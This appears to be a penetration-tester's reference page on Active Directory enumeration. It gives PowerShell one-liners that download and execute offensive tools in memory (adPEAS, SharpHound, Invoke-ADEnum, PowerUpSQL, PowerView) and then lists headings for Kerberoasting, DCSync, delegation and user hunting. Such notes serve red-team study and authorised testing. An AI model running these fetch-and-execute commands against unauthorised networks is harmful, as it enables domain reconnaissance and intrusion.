Active Directory Enumeration
Enumeration Tools
# adPEAS
IEX(IWR -usebasicparsing https://raw.githubusercontent.com/61106960/adPEAS/main/adPEAS.ps1);Invoke-adPEAS
IEX(IWR -usebasicparsing https://raw.githubusercontent.com/61106960/adPEAS/main/adPEAS-Light.ps1);Invoke-adPEAS
# BloodHound
IEX(IWR -usebasicparsing https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Collectors/SharpHound.ps1);Invoke-Bloodhound -CollectionMethod "All,GPOLocalGroup"
IEX(IWR -usebasicparsing https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Collectors/SharpHound.ps1);Invoke-Bloodhound -CollectionMethod "All,GPOLocalGroup" -Loop -Loopduration 06:00:00 -LoopInterval 00:15:00
# Invoke-ADEnum
IEX(IWR -UseBasicParsing https://raw.githubusercontent.com/Leo4j/Invoke-ADEnum/main/Invoke-ADEnum.ps1);Invoke-ADEnum
# PowerUpSQL
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/PowerUpSQL.ps1")
# PowerView
IEX(IWR -usebasicparsing https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1)Native AD Module
General Enumeration
Domain Computer Enumeration
Domain Enumeration
Domain Controller Enumeration
Domain Policy Enumeration
Domain Trust Enumeration
Forest Enumeration
Group Enumeration
Group Managed Service Accounts
Group Policy Enumeration
Organizational Units Enumeration
User Eumeration
Other
Access Control Lists
AppLocker / WDAC
AS-REP Roastable Users
AS-REP RoastingKerberoastable Users
KerberoastingDCSync Rights
DCSyncDelegation - Constrained
Delegation - Unconstrained
Deleted Users
LAPS Enumeration
LAPS Delegation
Machine Account Quota
MSSQL Enumeration
PowerUpSQL
SQL Commands
MSSQL - PowerupSQL exploit example
Shares and Files Enumeration
PowerView (Shares)
SPN Enumeration
User Hunting
PowerView
Administrative User Identification
Local System Enumeration
PowerView
WinNT Service
Domain Group Enumeration
AdminCount = 1
PowerShell
PowerView
AD Groups with Local Admin Rights
PowerView
Virtual Admins
PowerView
Systems with Admin Rights
PowerView
Tools
Bloodhound
Ingestors
Custom Queries
Additional Notes
Lab Reviews:
Last updated